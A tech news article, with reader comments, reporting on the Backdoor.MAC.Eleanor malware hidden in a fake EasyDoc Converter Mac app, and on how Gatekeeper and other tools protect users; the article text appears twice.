New Mac malware can remotely access FaceTime camera, but macOS Gatekeeper users are protected
A new piece of Mac-targeting malware is in the wild, potentially allowing hackers to remotely execute code and even control the FaceTime camera on a user's computer, but Apple's own Gatekeeper security prevents the unsigned app from being installed.
The newly unleashed EasyDoc Converter installs a wide array of malware on a victim's computer -- but it isn't signed by Apple, which means the Gatekeeper tool in macOS should adequately protect users with default settings. Researchers at Bitdefender published an analysis detailing the malware package this week, dubbing it "Backdoor.MAC.Eleanor."
The malware is hidden inside a fake file converter application named "EasyDoc Converter.app." Once users install the nonfunctional software, it downloads a malicious script.
Following installation of the app, it will fetch a number of tools that can access the FaceTime camera, download files, execute commands, and even send emails with attached files.
The remote FaceTime camera access is possible through an open-source camera access tool known as "wacaw." The EasyDoc Converter also includes a Tor hidden service, allowing attackers to remotely control the machine.
However, users who have Apple's Gatekeeper security package enabled on their Mac -- as it is by default -- are said to be protected.
Additionally, an Internet connection monitoring application like Little Snitch can be used to monitor and block incoming and outgoing tranmissions. Additionally, utilities similar to Patrick Wardle's BlockBlock can prevent installation of persistent components such as malware. AppleInsider tested an installation of the malware, and as of yet, Apple's integrated Xprotect has not been updated to stop the recently discovered malware.
Today's revelation of the "Backdoor.MAC.Eleanor" malware is the second OS X specific discovery in 2016, not including adware. In March, a bogus version of BitTorrent client Transmission was uploaded to its file repository, and was downloaded by unsuspecting users 6,500 times in its brief availability. It was ultimately stopped by an Xprotect update, and removal instructions were posted by the legitimate Transmission developers.
Regarding the Backdoor.Mac.Eleanor installation, computer forensics expert Jonathan Zdziarski told The Register that the package "could be serious for users who ran the program, but of course the lesson (as always) is to be careful what you install on your computer."
The EasyDoc Converter application was removed from MacUpdate overnight, and was never available on the Mac App Store.
The newly unleashed EasyDoc Converter installs a wide array of malware on a victim's computer -- but it isn't signed by Apple, which means the Gatekeeper tool in macOS should adequately protect users with default settings. Researchers at Bitdefender published an analysis detailing the malware package this week, dubbing it "Backdoor.MAC.Eleanor."
The malware is hidden inside a fake file converter application named "EasyDoc Converter.app." Once users install the nonfunctional software, it downloads a malicious script.
Following installation of the app, it will fetch a number of tools that can access the FaceTime camera, download files, execute commands, and even send emails with attached files.
The remote FaceTime camera access is possible through an open-source camera access tool known as "wacaw." The EasyDoc Converter also includes a Tor hidden service, allowing attackers to remotely control the machine.
However, users who have Apple's Gatekeeper security package enabled on their Mac -- as it is by default -- are said to be protected.
Additionally, an Internet connection monitoring application like Little Snitch can be used to monitor and block incoming and outgoing tranmissions. Additionally, utilities similar to Patrick Wardle's BlockBlock can prevent installation of persistent components such as malware. AppleInsider tested an installation of the malware, and as of yet, Apple's integrated Xprotect has not been updated to stop the recently discovered malware.
Today's revelation of the "Backdoor.MAC.Eleanor" malware is the second OS X specific discovery in 2016, not including adware. In March, a bogus version of BitTorrent client Transmission was uploaded to its file repository, and was downloaded by unsuspecting users 6,500 times in its brief availability. It was ultimately stopped by an Xprotect update, and removal instructions were posted by the legitimate Transmission developers.
Regarding the Backdoor.Mac.Eleanor installation, computer forensics expert Jonathan Zdziarski told The Register that the package "could be serious for users who ran the program, but of course the lesson (as always) is to be careful what you install on your computer."
The EasyDoc Converter application was removed from MacUpdate overnight, and was never available on the Mac App Store.
Comments
Gatekeeper is annoying.
I own my computer and I don’t want Apple telling me what I can download.
I’m a geek so I don’t need protection by Apple.
Did I miss any?
To be fair, those are all fair criticisms of most such software (well, maybe not the last one lol) so it's not that unreasonable for people who haven't used it to assume that Gatekeeper is just as bad as other such solutions. Especially if they lived through Vista. lol I'm a huge fan of Gatekeeper, though, and leave it on its most restrictive setting. Then when I install a new app, I have to right-click to open it. Once. Then it never bothers me again. Best of both worlds!
Unprotected sex can lead to AIDS.
Missed your "/s" Power (and no headache) to us -geeks- who prefer the iOS and macOS walled gardens. We can geek out without these headaches.
Even on the most restrictive setting (app store only) you can right click to specifically allow running of non app store (but recognized developers) apps
this flags the app as "ok" so it will run in the future without requiring the right click.
To run un recognized developers apps, right click on the app to attempt to run, which will be refused because of an un-recognized developer,
then go to the security and privacy settings (in system prefs) and an option to "run anyway" will be available, click that and the app will run (and be flagged as "ok" for future launches.)
Setting security to "App Store & identified developers" removes the necessity to first right click on the app to run recognized developers apps
There is NO functionality restriction to leaving app security on on "Mac App Store", or "App Store & identified developers"
http://www.macrumors.com/2013/12/18/software-allows-hackers-to-activate-macbook-webcams-without-green-warning-light/
http://www.cultofmac.com/258855/alarming-study-shows-macs-camera-can-secretly-spy/
Edit: If Charlie Miller says it would require a “lot of work and resources," then it's really tough. As in darn near impossible.
This app runs as the local user and never gets access to the privileges needed even on versions of OS X that permitted updating the camera's firmware from inside.
Note that 'likely' means that no one has discovered a hack being used against Macs built after 2008, and has not been reported by or to anyone since 2013.
I recently downloaded some trialware on my Mac. The moment I double-clicked on the .dmg, GateKeeper said "uh, uh!" and I moved the .dmg to trash.
Let OS X do the hard work. Life's too short to worry about malware.
The sandbox restrictions can be a problem especially for cross-platform apps as they have to restrict the app to the sandboxed filesystem containers and the developers are also identified with code-signing, some developers wouldn't want that.
https://bombich.com/kb/ccc4/why-isnt-ccc-on-mac-app-store
Apple should be locking down sensitive folders like LaunchAgents and LaunchDaemons, this was used by the Mac Defender and Flashback malware too. Legitimate apps hardly ever use this functionality. It looks like they locked down dynamic library overrides with SIP in El Capitan. As soon as apps try to modify anything sensitive, the system should prompt the user about what it's doing. If it's leaving invisible folders around or dumping executables outside the Applications folder, at least let the user know what the app is doing. Apple can also keep an approved list of binaries and settings that are known from trusted publishers or known to be harmless and the system can check against this list regularly and have a system panel that shows warnings about unapproved settings that may be harmful. Having descriptions of processes and configurations would be nice too, Apple sometimes uses abbreviated names for system daemons and it's hard to tell if they are legitimate like secd, pbs, pkd, tccd. System processes approved or developed by Apple should be labelled in Activity Monitor and Get Info panels so it's easy to spot rogue processes.